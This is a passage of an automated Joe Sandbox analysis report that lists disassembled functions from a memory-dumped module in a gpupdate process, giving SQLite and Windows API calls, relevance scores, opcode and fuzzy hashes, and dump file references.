                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1477753154-0
                                              • Opcode ID: 783e2a81de97867b24cd5286cf3dd9dc738d5cb1726448c1f060efc180a86d4f
                                              • Instruction ID: 2ec5576c85aa098ab27af396d84eda45cd70bc00af5b01c16e6f6aecf1f3e678
                                              • Opcode Fuzzy Hash: 783e2a81de97867b24cd5286cf3dd9dc738d5cb1726448c1f060efc180a86d4f
                                              • Instruction Fuzzy Hash: D331F435618A478BDF186FF9C48174D77F2FBA6315F61CA29D9108B384D734E8818B42
                                              Function 61E209B5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 875 61e209b5-61e209cc malloc 876 61e209db-61e209f6 sqlite3_log 875->876 877 61e209ce-61e209d9 875->877 878 61e209f9-61e209fe 876->878 877->878
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: mallocsqlite3_log
                                              • String ID:
                                              • API String ID: 2785431543-0
                                              • Opcode ID: 762f3cecbb2cc6ce498a2c85ebf91d096e95fb885d840f66f5124c4f1cb08d44
                                              • Instruction ID: a58efad2485bfd2d115470bb174d9dd3f0b05b5c5fd98957aa1cee9a765f5466
                                              • Opcode Fuzzy Hash: 762f3cecbb2cc6ce498a2c85ebf91d096e95fb885d840f66f5124c4f1cb08d44
                                              • Instruction Fuzzy Hash: 1EF030B0808349DFDB00AFA5C8D5509BFE4AB44208F18C86DD5888F241D335E580CB51

                                              Non-executed Functions

                                              Function 61E1F76F Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_int.SQLITE3 ref: 61E1F7C4
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E1F7E4
                                              • sqlite3_value_blob.SQLITE3 ref: 61E1F7F1
                                              • sqlite3_value_text.SQLITE3 ref: 61E1F808
                                              • sqlite3_value_int.SQLITE3 ref: 61E1F858
                                              • sqlite3_result_text64.SQLITE3 ref: 61E1F9A8
                                              • sqlite3_result_blob64.SQLITE3 ref: 61E1FA02
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                              • String ID:
                                              • API String ID: 3992148849-0
                                              • Opcode ID: 32ec2822a106b0c0300c28cf28beb2417567549d1fbefd80d2561129108e9af0
                                              • Instruction ID: 1f4e35eb0e2ab212214037c2dc6131f837df280cad1a81bb716eed5fbef86816
                                              • Opcode Fuzzy Hash: 32ec2822a106b0c0300c28cf28beb2417567549d1fbefd80d2561129108e9af0
                                              • Instruction Fuzzy Hash: 80918675D0C2159FDB01DFE8D88168DBBF2BB89324F29C219D8A497398D738D846CB91
                                              Function 61E389F9 Relevance: 7.8, APIs: 5, Instructions: 346COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_malloc64$memcmpsqlite3_freesqlite3_realloc64
                                              • String ID:
                                              • API String ID: 1852262425-0
                                              • Opcode ID: d757fc0aa42139f9827abdeaf4baac5dffdcd202dab837edbaa80009a11a9504
                                              • Instruction ID: 4b54f3f36749ea8035a508ad4162133be33140e684b6039546cac4230f00478b
                                              • Opcode Fuzzy Hash: d757fc0aa42139f9827abdeaf4baac5dffdcd202dab837edbaa80009a11a9504
                                              • Instruction Fuzzy Hash: 9CE11675A04259CFDB08CF68C490A9ABBF2FF88314F258669EC15EB305D734E952DB90
                                              Function 61E97670 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 61E976A9
                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E976BA
                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E976C2
                                              • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E976CA
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E976D9
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID:
                                              • API String ID: 1445889803-0
                                              • Opcode ID: dfccb63fba2f9df7055a9ea425e1ed332588b13f7436a2e679c3ccf170081719
                                              • Instruction ID: 5378e33c4accfa4a652d7627989745bfecadcec4d98953d240cc670505de27fd
                                              • Opcode Fuzzy Hash: dfccb63fba2f9df7055a9ea425e1ed332588b13f7436a2e679c3ccf170081719
                                              • Instruction Fuzzy Hash: 9B1182B29157818FDB00DFB9D68854BBBE4FB89655F050D3AE584C7300DB35D889CB92
                                              Function 61E7B95B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E7B974
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E7BB86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: BINARY$INTEGER
                                              • API String ID: 1477753154-1676293250
                                              • Opcode ID: 2c554db4660cb6c57b7a9fb00e640c1e278f76a1e48809cb071128644c8c90b9
                                              • Instruction ID: 7e8b447c246aa8a7f655e9cbd08aa3b5a8fb0c2bf1e122e76d731d7f3ac658ba
                                              • Opcode Fuzzy Hash: 2c554db4660cb6c57b7a9fb00e640c1e278f76a1e48809cb071128644c8c90b9
                                              • Instruction Fuzzy Hash: FB711674E0461A9FEB10DF69C580B9EBBF1AF88359F25C129EC58AB350D734E941CB90
                                              Function 61E49FA3 Relevance: 6.4, APIs: 4, Instructions: 431COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49FB8
                                                • Part of subcall function 61E17A8A: sqlite3_mutex_try.SQLITE3(?,?,?,61E17B0A), ref: 61E17A2A
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49FD1
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E4A0EF
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E4A513
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                              • String ID:
                                              • API String ID: 2068833801-0
                                              • Opcode ID: 649a56fa3e0e189834fc9add8e7c4aa64599f0a0b0222f9a22dfd917d4d086ff
                                              • Instruction ID: 7c7b833e239c191438fdaf3b6edf12dd7bd5d2b910197c724757ca0903e9d990
                                              • Opcode Fuzzy Hash: 649a56fa3e0e189834fc9add8e7c4aa64599f0a0b0222f9a22dfd917d4d086ff
                                              • Instruction Fuzzy Hash: E3022774A45255CFDB08CFA9D590A9DBBF2BF88328F25C069E806AB365D734EC41CB41
                                              Function 61E2324A Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_bind_int64.SQLITE3 ref: 61E2328C
                                                • Part of subcall function 61E22E72: sqlite3_mutex_leave.SQLITE3 ref: 61E22EB1
                                              • sqlite3_bind_double.SQLITE3 ref: 61E232AF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465616180-0
                                              • Opcode ID: f99ae3b5129764ca8367ae33a8df5cc808f116b91a21326fb4d0250ffedff2fa
                                              • Instruction ID: 5896e611c4b1b30f4a3b4a07ae61e11bd566ae15a861f1e1fad077160fe4dcd2
                                              • Opcode Fuzzy Hash: f99ae3b5129764ca8367ae33a8df5cc808f116b91a21326fb4d0250ffedff2fa
                                              • Instruction Fuzzy Hash: 82217A715087058BDB04CF59D4A02AABBE1EB4D364F24C55EE8A84B391D731C981CF82
                                              Function 61E23002 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2301C
                                              • sqlite3_bind_zeroblob.SQLITE3 ref: 61E23041
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E23061
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 2187339821-0
                                              • Opcode ID: 989fa178f087b960d7db68ce717af5cf8d5c1215fb6e0daa9782bb119f5b4922
                                              • Instruction ID: db3894be156d8cf12e60cd26fe0a1997967f179a0cb3c7f8cc857e66480259ef
                                              • Opcode Fuzzy Hash: 989fa178f087b960d7db68ce717af5cf8d5c1215fb6e0daa9782bb119f5b4922
                                              • Instruction Fuzzy Hash: 07015678A006559FCB00DF69C0D084ABBF1FF8A764B20C46AE9489B304C639EC55CB92
                                              Function 61E10F3B Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10EC9
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E10F2C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1477753154-0
                                              • Opcode ID: c4dc9c4ee8e10b42f5de153207b584ce54285814cddb9023b8d95c57b347a9f0
                                              • Instruction ID: 954b12e71e31b8b1774797dcdc2e0e56283fa06a1326973544bc65dc27dc67d4
                                              • Opcode Fuzzy Hash: c4dc9c4ee8e10b42f5de153207b584ce54285814cddb9023b8d95c57b347a9f0
                                              • Instruction Fuzzy Hash: 0A212E309046098FCB04DFA9C485BE9BBF0FF49314F1881A9E818AB392D775E995CB90
                                              Function 61E0A583 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E0A599
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E0A5E4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1477753154-0
                                              • Opcode ID: 479085ff5ac9ff62e865888be1c24ae045958fa623bdae56ee3a5fdc352e8daa
                                              • Instruction ID: b71f433e504de0b261977696fadc968523d34f9192216a9ff7f15f89263728ed
                                              • Opcode Fuzzy Hash: 479085ff5ac9ff62e865888be1c24ae045958fa623bdae56ee3a5fdc352e8daa
                                              • Instruction Fuzzy Hash: 0A01FD366046008BCB009F69C4C0699BBB4FF86224F18C16AEC188F35AC734D992C791
                                              Function 61E23121 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E23103
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: be673099259576e920fd61dd78c95926ff95d13bae78bbf2174aec2f2713d0f2
                                              • Instruction ID: 2b04a1b11660bfd600b020d7c6464076e2738772fcebe01106c59a6401ffa3f2
                                              • Opcode Fuzzy Hash: be673099259576e920fd61dd78c95926ff95d13bae78bbf2174aec2f2713d0f2
                                              • Instruction Fuzzy Hash: B9314D74A046498FCB04DF69C4D0A9EBBF5AF8D224F248169E854DB344D735DD42CF51
                                              Function 61E22F18 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22F77
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: 9d2563107c3d7ad19fe3e8a797df8b3f4ee5affb22cbeb628133f1e385e922bc
                                              • Instruction ID: f5e3bb4e88093191f6e112c50f49589816f1419e6117754185815d52abf3dd4a
                                              • Opcode Fuzzy Hash: 9d2563107c3d7ad19fe3e8a797df8b3f4ee5affb22cbeb628133f1e385e922bc
                                              • Instruction Fuzzy Hash: 6E113570A0430A8BDB04CF6AD4C099AFBB5FF99354F14862AE8489B301D334E991CFD2
                                              Function 61E22DF9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22E54
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: 16e56d3f0ebea52f33b955e2179123d36e9851909adcc903851d759f371e3d00
                                              • Instruction ID: 3a390614baaddcda148a4f20354a1a419c311afeb24f15c3aa1b77d9a20a727a
                                              • Opcode Fuzzy Hash: 16e56d3f0ebea52f33b955e2179123d36e9851909adcc903851d759f371e3d00
                                              • Instruction Fuzzy Hash: B501717572060A8BCB04AF79DCD05A9BBB4FF99324B24C168E8149B304D734D869DB55
                                              Function 61E22F95 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22FF3
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
